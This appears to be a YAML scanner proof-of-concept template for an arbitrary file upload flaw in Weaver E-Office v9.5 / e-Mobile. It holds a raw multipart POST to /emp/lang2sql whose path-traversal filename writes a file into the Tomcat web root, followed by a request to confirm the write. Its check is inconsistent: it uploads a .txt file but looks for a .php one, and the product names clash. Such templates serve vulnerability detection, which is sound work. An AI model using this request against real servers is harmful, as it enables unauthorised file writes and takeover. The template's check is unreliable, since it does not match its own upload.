id: emobile-lang2sql-file-upload

info:
  name: 泛微标准协同办公平台 E-Office v9.5 任意文件上传漏洞
  author: qwtd
  severity: critical
  verified: false
  description: |
    weaver E-Office v9.5 file upload vulnerability official website:https://www.e-office.cn/
    hunter: app.name="泛微 e-Mobile 移动管理平台"
  reference:
    - https://blog.csdn.net/weixin_46944519/article/details/130968825
  tags: emobile,fileupload
  created: 2023/10/30

set:
  randstr: randomLowercase(6)
  randbody: randomLowercase(12)
  rboundary: randomLowercase(8)
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |
        POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
        Content-Length: 204
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Connection: close
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundary{{rboundary}}

        ------WebKitFormBoundary{{rboundary}}
        Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/{{randstr}}.txt"

        {{randbody}}
        ------WebKitFormBoundary{{rboundary}}--
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))
expression: r0() && r1()  